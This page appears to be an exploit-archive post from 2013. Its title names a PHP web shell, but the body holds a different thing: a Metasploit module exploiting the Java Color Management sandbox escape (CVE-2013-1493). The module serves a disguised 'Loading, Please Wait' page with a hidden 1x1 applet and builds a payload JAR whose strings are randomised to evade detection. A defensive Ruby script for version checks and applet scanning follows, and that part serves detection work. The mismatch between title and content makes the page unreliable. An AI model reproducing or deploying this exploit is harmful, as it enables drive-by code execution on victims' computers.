STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  def setup
    # The helper classes are shipped with the framework; Init.class is
    # renamed at run time so the served class name is not static.
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Build the applet JAR: the payload classes plus the four helper classes.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the fixed "metasploit"/"Payload" strings in entry names and data.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end
end
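The following Ruby script is an added defensive example; it is not part of the forum post above and not code from the Metasploit project. It turns two facts the module description states into checks a defender can run: the affected runtime range (Java 7u15 and earlier, 6u41 and earlier) becomes a patch-status test for reported JRE version strings, and the shape of the page generate_html serves (a 1x1 applet whose archive is a randomly named .jar) becomes a scan over HTML bodies captured from a proxy or sandbox. All function names, the constants, and the two sample pages are my own constructions.

```ruby
# Added defensive example, not part of the forum post or the Metasploit module.
# Two checks built from what the module description states:
#   jre_vulnerable?         - is a JRE version string inside the affected range
#                             (7u15 and earlier, 6u41 and earlier)?
#   suspicious_applet_tags  - does an HTML body carry a tiny 1x1 applet tag that
#                             loads a .jar, the shape generate_html above emits?
# Sample pages below are constructed for illustration.

# Parse "1.7.0_15" or "7u15" into [family, update]; nil when not understood.
def parse_jre_version(str)
  if (m = str.match(/\A1\.(\d+)\.\d+(?:_(\d+))?\z/))
    [m[1].to_i, (m[2] || 0).to_i]
  elsif (m = str.match(/\A(\d+)u(\d+)\z/))
    [m[1].to_i, m[2].to_i]
  end
end

# Last affected update per family, taken from the module description.
LAST_VULNERABLE_UPDATE = { 7 => 15, 6 => 41 }.freeze

# True when the reported version falls inside the affected range; families the
# description does not mention (5, 8, ...) and unparseable strings yield false.
def jre_vulnerable?(str)
  family, update = parse_jre_version(str)
  return false if family.nil?
  limit = LAST_VULNERABLE_UPDATE[family]
  !limit.nil? && update <= limit
end

APPLET_TAG = /<applet\b([^>]*)>/i

# Pull one attribute value out of an applet tag's attribute string.
def applet_attr(attrs, name)
  m = attrs.match(/\b#{name}\s*=\s*["']?([^"'\s>]+)/i)
  m && m[1]
end

# Return one {archive:, code:} hash per applet tag that loads a .jar and is
# rendered at 1x1 pixels, i.e. hidden from the user.
def suspicious_applet_tags(html)
  hits = []
  html.scan(APPLET_TAG).flatten.each do |attrs|
    archive = applet_attr(attrs, 'archive')
    width   = applet_attr(attrs, 'width')
    height  = applet_attr(attrs, 'height')
    next unless archive && archive =~ /\.jar\z/i
    next unless width == '1' && height == '1'
    hits << { archive: archive, code: applet_attr(attrs, 'code') }
  end
  hits
end

# Constructed sample pages: a normal-sized applet and one shaped like the
# module's landing page.
BENIGN_PAGE = '<html><body><applet archive="chart.jar" code="Chart.class" ' \
              'width="640" height="480"></applet></body></html>'
SUSPECT_PAGE = '<html><head><title>Loading, Please Wait...</title></head>' \
               '<body><center><p>Loading, Please Wait...</p></center>' \
               '<applet archive="qzXmLkPa.jar" code="Rtwe.class" width="1" height="1">' \
               '</applet></body></html>'

if __FILE__ == $0
  %w[1.7.0_15 1.7.0_17 1.6.0_41 1.6.0_43 7u11 1.8.0_05].each do |v|
    puts "#{v}: #{jre_vulnerable?(v) ? 'inside affected range' : 'outside affected range'}"
  end
  [BENIGN_PAGE, SUSPECT_PAGE].each_with_index do |page, i|
    puts "page #{i}: #{suspicious_applet_tags(page).inspect}"
  end
end
```

The version check deliberately treats families the description does not cover as outside the range rather than guessing, so a Java 5 or Java 8 string is reported as not matching this advisory and must be judged against its own advisories. The applet scan keys on the hidden 1x1 geometry plus a .jar archive rather than on the random file name, which is the one thing the module changes per request.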